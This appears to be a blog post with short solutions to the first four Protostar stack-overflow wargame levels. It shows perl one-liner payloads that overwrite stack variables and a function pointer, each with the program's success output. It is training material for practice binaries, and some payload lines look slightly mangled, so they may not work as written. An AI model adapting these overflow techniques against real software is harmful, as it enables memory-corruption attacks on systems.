Protostar Stack Exploits (Solutions 0-3)
Buffer overflow exploit exercises, part one.
Protostar is a series of exercises from Exploit Exercises. In addition to three final levels, it has four basic sections: network programming, format strings, heap overflows, and stack overflows.
This series of posts contains solutions and walkthroughs for the stack overflow levels (“Stack”). It assumes basic knowledge of systems programming and is meant to serve as a reference for those stuck on certain levels.
This is the first of three posts for Stack. The first four levels are straightforward, and their corresponding posts contain little explanation (solutions). The last three levels have more potential pitfalls, and those posts contain more detailed explanations (walkthroughs).
## Stack: Level 0 Description (full): Overwrite a variable on the stack.
$ perl -e "print 'a'x65" | ./stack0 you have changed the 'modified' variable
Stack: Level 1
Description (full): Overwrite a variable on the stack with a specific series of hex values.
$ ./stack1 $(perl -e "print 'a'x64 . dcba") you have correctly got the variable to the right value
## Stack: Level 2 Description (full): Overwrite a variable by using an environmental variable.
$ export GREENIE=$(echo -e "$(perl -e "print ax64")\n\r\n\r") $ ./stack2 you have correctly modified the variable
Stack: Level 3
Description (full): Overwrite a function pointer.
$ objdump -d ./stack3 | grep win 08048424 <win>: $ echo -e "$(perl -e "print 'a'x64")\x24\x84\x04\x08" | ./stack3 calling function pointer, jumping to 08048424 code flow successfully changed